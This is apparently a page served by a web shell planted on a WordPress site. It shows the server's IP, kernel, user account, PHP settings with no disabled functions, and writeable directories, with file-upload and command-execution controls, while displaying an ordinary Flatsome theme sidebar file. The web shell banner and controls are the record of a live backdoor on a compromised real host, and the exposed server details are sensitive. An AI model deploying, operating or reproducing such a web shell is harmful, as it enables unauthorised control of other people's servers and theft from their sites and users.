403Webshell
Server IP : 172.67.166.150  /  Your IP : 216.73.216.182
Web Server : LiteSpeed
System : Linux pbn-16.isgood.host 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gamenohushop ( 1160)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/gamenohu.shop/html/wp-content/themes/flatsome/inc/structure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/gamenohu.shop/html/wp-content/themes/flatsome/inc/structure/structure-sidebars.php
<?php

function flatsome_sidebar_classes(){

   echo implode(' ',  apply_filters( 'flatsome_sidebar_class', array() ) );
}


function flatsome_add_sidebar_class($classes){
	//$classes[] = 'col-divided';
	//$classes[] = 'widgets-boxed';

	return $classes;
}

add_filter('flatsome_sidebar_class','flatsome_add_sidebar_class', 10);

/**
 * Renders the sidebar menu header content.
 */
function flatsome_mobile_sidebar_top_content() {
	if ( $top_content = get_theme_mod( 'mobile_sidebar_top_content' ) ) {
		echo '<div class="sidebar-menu-top-content">';
		echo do_shortcode( $top_content );
		echo '</div>';
	}
}

add_action( 'flatsome_before_sidebar_menu_elements', 'flatsome_mobile_sidebar_top_content' );

Youez - 2016 - github.com/yon3zu
LinuXploit